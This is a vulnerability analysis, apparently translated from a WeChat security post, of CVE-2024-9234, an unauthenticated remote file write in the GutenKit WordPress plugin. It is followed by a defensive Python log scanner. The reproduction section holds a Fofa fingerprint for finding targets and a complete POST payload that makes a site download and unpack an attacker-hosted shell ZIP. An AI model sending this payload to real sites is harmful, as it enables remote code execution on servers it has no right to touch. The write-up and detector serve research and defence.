0x00 Preface
CVE-2024-9234: I found no related write-ups or exploits online, so I decided to analyze it.
GutenKit is a WordPress page builder for designing your next WordPress site in Gutenberg. With Gutenberg's native drag-and-drop interface, 50+ WordPress blocks, 14+ versatile modules and 500+ templates, you can create professional, responsive web content in minutes. This vulnerability is a standard remote file write. Plugin downloads: 9000+
Affected versions: <=2.1.0
Fofa fingerprint: "wp-content/plugins/gutenkit-blocks-addon"
First download and install the WordPress plugin GutenKit 2.1.0, then activate it.
WordPress test version: 5.6.1
0x01 Vulnerability analysis
The install_and_activate_plugin_from_external method in the controller at /wp-content/plugins/gutenkit-blocks-addon/includes/Admin/Api/ActivePluginData.php performs an obvious file download: it fetches a ZIP file with download_url and extracts it straight into the /wp-content/plugins/ directory.
public function install_and_activate_plugin_from_external($request) {
    // The external plugin URL
    $plugin_url = $request->get_param('plugin');
    $slug = $request->get_param('slug');
    $plugin_slug = "$slug/$slug.php";
    $plugin_dir = WP_PLUGIN_DIR; // This points to wp-content/plugins

    require_once ABSPATH . 'wp-admin/includes/file.php';
    require_once ABSPATH . 'wp-admin/includes/plugin.php';
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';

    WP_Filesystem();

    // Download the plugin ZIP file
    $temp_file = download_url($plugin_url);
    if (is_wp_error($temp_file)) {
        wp_send_json_error('Failed to download plugin. Error: ' . $temp_file->get_error_message());
        return;
    }

    $command = "unzip $temp_file -d $plugin_dir";
    exec($command);

    // Unzip the plugin into the wp-content/plugins directory
    $unzip_result = unzip_file($temp_file, $plugin_dir);

    // Delete the temporary file after unzipping
    unlink($temp_file);

    if (is_wp_error($unzip_result)) {
        wp_send_json_error('Failed to unzip plugin. Error: ' . $unzip_result->get_error_message());
        return;
    }

    // Check if the plugin directory exists
    $plugin_path = $plugin_dir . '/' . $plugin_slug;
    if (!file_exists($plugin_path)) {
        wp_send_json_error('The plugin directory does not exist after unzipping.');
        return;
    } else {
        wp_send_json_success('Plugin installed successfully!');
    }
}
Tracing the entry point: the REST API routes and their handlers are registered in the same controller file.
public function __construct() {
    add_action('rest_api_init', function() {
        register_rest_route('gutenkit/v1', 'active-plugin',
            array(
                'methods' => WP_REST_Server::READABLE,
                'callback' => [$this, 'action_get_active_plugin'],
                'permission_callback' => '__return_true',
            ),
        );
    });

    add_action('rest_api_init', function() {
        register_rest_route('gutenkit/v1', 'install-active-plugin',
            array(
                'methods' => WP_REST_Server::EDITABLE,
                'callback' => [$this, 'install_and_activate_plugin_from_external'],
                'permission_callback' => '__return_true',
            ),
        );
    });
}
Because the permission_callback is '__return_true', no authentication is checked, so a single request to /wp-json/gutenkit/v1/install-active-plugin is enough to perform the write.
0x02 Reproduction
First prepare a PHP file containing <?php phpinfo();?>, compress it into a ZIP, then host it on a cloud server or VPS (using the https protocol is not recommended).
Payload:
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/wp-json/gutenkit/v1/install-active-plugin
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
plugin=http://xxx.xxx/shell.zip
When the error "The plugin directory does not exist after unzipping." is returned, the write has in fact already succeeded: the ZIP has been extracted into /wp-content/plugins/ and the file can be accessed directly.
0x03 Plugin download
Tags: code audit, 0day, penetration testing, system, general, 0day, Xianyu, Zhuanzhuan
To get the GutenKit source code, follow the official account and send 241016.
Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; the author and this official account accept no legal or joint liability. Please take note!!!
Originally published on the WeChat official account (星悦安全): Analysis of the WordPress GutenKit plugin remote file write vulnerability (RCE)
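As an added, defender-side example (not code from the original article or from the GutenKit project): a small Python scan over constructed web-server access-log lines that flags every request to the unauthenticated install-active-plugin endpoint described above, and any later request by the same client for a .php file under /wp-content/plugins/, which is where the extracted ZIP lands. The combined log format, the sample lines and the client addresses are assumptions.

```python
import re

# Detection for CVE-2024-9234 style abuse of the GutenKit REST endpoint.
# The route is registered with permission_callback => '__return_true', so
# every hit on it is worth reviewing; a following request for a .php file
# under /wp-content/plugins/ from the same client suggests the dropped file
# was then executed.
ENDPOINT = "/wp-json/gutenkit/v1/install-active-plugin"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
PLUGIN_PHP_RE = re.compile(r"^/wp-content/plugins/[^/]+/[^?]*\.php$")

def parse_line(line):
    """Parse one combined-format access log line; None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def scan(lines):
    """Return (ip, finding_kind, path) tuples in log order."""
    findings = []
    installers = set()  # clients that called the vulnerable endpoint
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        path = rec["path"].split("?", 1)[0]
        if path.rstrip("/") == ENDPOINT:
            installers.add(rec["ip"])
            findings.append((rec["ip"], "install-endpoint", path))
        elif rec["ip"] in installers and PLUGIN_PHP_RE.match(path):
            findings.append((rec["ip"], "plugin-php-after-install", path))
    return findings

# Constructed sample access log (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [16/Oct/2024:10:01:02 +0000] "GET /wp-json/gutenkit/v1/active-plugin HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Oct/2024:10:01:05 +0000] "POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1" 200 97 "-" "Mozilla/5.0"
198.51.100.9 - - [16/Oct/2024:10:01:07 +0000] "GET /wp-content/plugins/gutenkit-blocks-addon/assets/app.js HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Oct/2024:10:01:09 +0000] "GET /wp-content/plugins/shell/shell.php HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, kind, path in scan(SAMPLE_LOG):
        print(f"{ip}\t{kind}\t{path}")
```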